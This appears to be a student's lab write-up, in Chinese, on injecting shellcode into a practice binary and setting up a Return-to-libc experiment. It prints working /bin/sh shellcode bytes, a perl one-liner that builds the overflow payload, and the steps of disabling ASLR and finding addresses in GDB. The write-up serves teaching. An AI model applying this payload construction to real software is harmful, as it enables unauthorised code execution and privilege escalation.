20145315《网络对抗》——注入shellcode以及 Return-to-libc攻击实验
shellcode
准备一段Shellcode
我用的老师的shellcode:\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x31\xd2\xb0\x0b\xcd\x80\x90\x00\xd3\xff\xff\x00
环境设置
- 设置堆栈可执行
- 关闭地址随机化
然后,跳进了坑里
- 用结构为:nops+shellcode+retaddr进行了shellcode注入
- 6个nop+shellcode+返回地址,返回地址先用\x4\x3\x2\x1代替,之后确定具体值
- 准备好了注入文件用00结尾
- 然后把shellcode注入pwn1
确定注入的shellcode的地址
- 打开一个新的终端,进行GDB调试
- 设置断点
- 寻找esp指向的地址
- 在附近寻找shellcode的地址
- 然后继续执行,确定返回地址所占的位置是否正确
失败了
然后,把\x4\x3\x2\x1替换为内存中shellcode的地址
注入后运行shell,失败,原因是指令被覆盖了
从坑里爬起来继续
- 这次构造的是结构为:anything+retaddr+nops+shellcode
- perl -e 'print "A" x 32;print "\x30\xd3\xff\xff\x90\x90\x90\x90\x90\x90\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x31\xd2\xb0\x0b\xcd\x80\x90\x00\xd3\xff\xff\x00"' > input_shellcode
- 成功
Return-to-libc攻击实验
准备工作,使用另一个 shell 程序(zsh)代替/bin/bash。
漏洞程序
- retlib
- 编译该程序,并设置 SET-UID